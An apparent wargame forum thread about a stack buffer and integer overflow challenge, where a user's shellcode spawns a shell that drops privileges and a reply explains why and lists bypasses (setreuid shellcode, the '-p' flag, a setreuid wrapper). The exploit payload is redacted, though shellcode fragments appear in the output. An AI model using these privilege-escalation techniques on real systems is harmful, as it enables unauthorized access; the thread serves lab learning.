App - System
App - System ELF x86 - Stack buffer and integer overflow binary dropping privileges
Hello all
I’ve achieved code execution on ELF x86 - Stack buffer and integer overflow outside of GDB, but even though I am clearly running in a new shell, I am still running as the same user: I can’t access the .passwd file!
I’m not sure what’s going on here; I could just be doing it wrong, but I don’t see how, and I’m not sure as to the rules surrounding sharing payloads on the forum.
Here is a redacted version of what I am doing;
app-systeme-ch11@challenge02: $ python -c "print ’...redacted...’ " > /tmp/mfile
app-systeme-ch11@challenge02: $ ./ch11 /tmp/mfile
[+] The pathname is : /������������������������������������������������������������������������������������������1�j
XQh//shh/bin��̀BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB����
$ id
uid=1111(app-systeme-ch11) gid=1111(app-systeme-ch11) groups=1111(app-systeme-ch11),100(users)
If someone could take a look and let me know if everything si working right, I would appreciate it.
App - System ELF x86 - Stack buffer and integer overflow binary dropping privileges
This is a normal behaviour. bash has been dropping its privileges if the euid is not the real uid for 15 years now. dash (symlinked by /bin/sh on our boxes) received a patch in early 2018 and now does the same.
From the bash man page:
If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, [...] the effective user id is set to the real user id. If the -p option is supplied at startup, the effective user id is not reset. Turning this option off causes the effective user and group ids to be set to the real user and group ids. There are several ways around this;
* use a shellcode that sets the uid/gid you want
* use a shellcode that passes the ’-p’ option (check the manpage)
* use a legacy shellcode but point it to your wrapper /tmp/xx that does a setreuid() then system()
New reply
New topic